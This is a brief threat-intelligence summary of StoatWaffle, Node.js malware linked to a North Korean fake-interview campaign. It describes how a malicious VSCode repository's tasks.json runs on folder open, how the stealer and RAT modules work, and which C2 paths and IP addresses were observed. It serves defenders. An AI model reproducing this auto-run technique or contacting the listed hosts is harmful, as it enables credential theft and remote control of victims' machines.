NTT Security Japan analyzed StoatWaffle, a newly observed Node.js malware used by WaterPlum Team 8 in the North Korea-linked Contagious Interview campaign. The attack uses a blockchain-themed malicious VSCode repository whose tasks.json runs on folder open, downloads code from a Vercel-hosted application, and stages additional Node.js downloaders. StoatWaffle polls C2 paths such as /api/errorMessage and /api/handleErrors before loading stealer and RAT modules. The stealer targets browser credentials, extension data, macOS Keychain data, installed-software details, and WSL-accessible Windows user data, while the RAT receives commands from /api/hsocketNext and returns results to /api/hsocketResult. The report lists C2 infrastructure including 185.163.125.196, 147.124.202.208, 163.245.194.216, 66.235.168.136, and 87.236.177.9.